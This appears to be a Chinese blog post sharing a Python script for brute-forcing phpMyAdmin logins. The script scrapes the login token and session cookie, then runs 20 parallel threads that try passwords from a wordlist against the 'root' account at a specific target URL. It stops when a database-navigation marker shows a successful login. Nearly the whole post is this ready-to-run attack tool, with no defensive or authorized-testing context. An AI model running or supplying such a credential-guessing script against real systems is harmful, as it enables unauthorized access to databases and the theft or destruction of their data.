新版 phpMyAdmin 登陆爆破 python 脚本

#coding=utf-8
 
import requests 
import re
import html
import time
import sys
from concurrent.futures import ThreadPoolExecutor,as_completed
from tqdm import tqdm
 
url = "https://member.sss.com/phpmyadmin/index.php"
 
def crack_pass(passwd):
    req = requests.session()
    rep = req.get(url)
    token = re.findall(r'token" value="(.+?)"',rep.text)[0]
    token, sessions = html.unescape(token), rep.cookies['phpMyAdmin']
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
    data = {
       "set_session": sessions,
       "pma_username":"root",
       "pma_password":passwd,
       "server":1,
       "target":"index.php",
       "token":token,
    }
    rep = req.post(url, data=data, timeout=60, headers=headers)
    reptext = re.findall(r'<div id="pma_errors"><div class="error"><img src="themes/dot.gif" title=""  class="icon ic_s_error" />(.+?)</div>',rep.text,re.S)
    if "ShowDatabasesNavigationAsTree" in rep.text:
       print(rep.status_code,passwd)
       sys.exit()
    return 0
 
with open(r"F:backpasspass.txt","rb") as f:
    pass_list = f.read()
    pass_list = pass_list.split()
 
start_time = time.time()
with ThreadPoolExecutor(20) as pool:
    to_do = []
    for passwd in pass_list:
       passwd = passwd.decode()
       to_do.append(pool.submit(crack_pass, passwd))
 
    for future in tqdm(as_completed(to_do), total=len(pass_list)):
       pass
 
print('总共耗时: {} '.format(time.time()-start_time))
新版 phpMyAdmin 登陆爆破 python 脚本
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容